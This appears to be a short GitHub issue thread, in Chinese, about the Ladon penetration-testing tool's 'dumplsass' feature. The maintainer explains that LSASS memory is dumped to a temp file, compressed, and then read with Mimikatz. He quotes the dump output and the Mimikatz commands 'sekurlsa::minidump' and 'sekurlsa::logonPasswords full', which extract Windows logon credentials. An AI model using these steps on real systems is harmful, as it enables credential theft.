### ISSUE TITLE
关于dumplsass

### ISSUE THREAD

**Issue by littleheary** [k8gege/Ladon#23]
请问dumplsass是怎么用的？需要导出lsass信息以后。
再使用mimikaz来看么？

**Comment by k8gege** [comment]
> 
> 
> 请问dumplsass是怎么用的？需要导出lsass信息以后。
> 再使用mimikaz来看么？

导出Lsass进程信息，然后再使用Mimikaz来读取，具体用法导出时会有提示。

Load MimiDump

[*] Dumping lsass (504) to C:\Windows\Temp\debug504.out
[+] Dump successful!

[*] Compressing C:\Windows\Temp\debug504.out to C:\Windows\Temp\debug504.gz gzip
 file
[*] Deleting C:\Windows\Temp\debug504.out

[*] Operating System : Windows 7 Enterprise
[*] Architecture     : AMD64
[*] Use "sekurlsa::minidump debug.out" "sekurlsa::logonPasswords full" on the same OS/arch
